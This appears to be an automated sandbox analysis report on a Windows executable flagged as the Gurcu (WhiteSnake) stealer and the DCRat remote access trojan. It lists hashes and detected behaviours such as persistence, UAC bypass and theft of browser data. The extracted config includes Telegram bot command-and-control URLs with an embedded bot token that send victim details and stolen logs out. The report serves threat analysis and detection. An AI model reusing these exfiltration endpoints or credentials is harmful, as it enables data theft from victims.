Resubmissions

21-11-2024 22:31

241121-2fewhasrfn 10

General

  • Target

    59b9f54f927431d2cf31d3aa202a0843.exe

  • Size

    2.2MB

  • Sample

    241121-2fewhasrfn

  • MD5

    59b9f54f927431d2cf31d3aa202a0843

  • SHA1

    b23d214605133dc8e930f9a9d473c7c7622b4b56

  • SHA256

    007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594

  • SHA512

    89106822646d8d412d5c956fd01ad37e4b1f34599497f8e362262f82d2d47f4460632019d6ec09da58c45d690ebd03f2812d5809743203be081702680bfb28f8

  • SSDEEP

    24576:9zyhnYISyKSBWpKCeCirC9CMz+052LEgPHQ944INbKK6uK5Ye6KBOO3op+kE9hk4:9zyt2DixLb4I5KKnK5zgdlKWky

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7606992605:AAHdyli6CX1hNl7JUoS2-auLJ7WvyqQjHD8/sendPhoto?chat_id=7606992605&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%20ee44a06e690425e9fc115dd2e629b02422993e11%0A%E2%80%A2%20Comment%3A%20%D1%8E%D1%82%D1%83%D0%B1%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20GYHASOLS%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20181.215.176.83%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CRecovery%5CWindowsRE%5Cfontdrvhost.ex

https://api.telegram.org/bot7606992605:AAHdyli6CX1hNl7JUoS2-auLJ7WvyqQjHD8/sendDocument?chat_id=7606992605&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%20ee44a06e690425e9fc115dd2e629b02422993e11%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A24.326348

Targets

    • Target

      59b9f54f927431d2cf31d3aa202a0843.exe

    • Size

      2.2MB

    • MD5

      59b9f54f927431d2cf31d3aa202a0843

    • SHA1

      b23d214605133dc8e930f9a9d473c7c7622b4b56

    • SHA256

      007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594

    • SHA512

      89106822646d8d412d5c956fd01ad37e4b1f34599497f8e362262f82d2d47f4460632019d6ec09da58c45d690ebd03f2812d5809743203be081702680bfb28f8

    • SSDEEP

      24576:9zyhnYISyKSBWpKCeCirC9CMz+052LEgPHQ944INbKK6uK5Ye6KBOO3op+kE9hk4:9zyt2DixLb4I5KKnK5zgdlKWky

    • DcRat

      DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

    • Dcrat family

    • Gurcu family

    • Gurcu, WhiteSnake

      Gurcu is a malware stealer written in C#.

    • Modifies WinLogon for persistence

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • UAC bypass

    • DCRat payload

      Detects payload of DCRat, commonly dropped by NSIS installers.

    • Drops file in Drivers directory

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Adds Run key to start application

    • Checks whether UAC is enabled

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

MITRE ATT&CK Enterprise v15

Tasks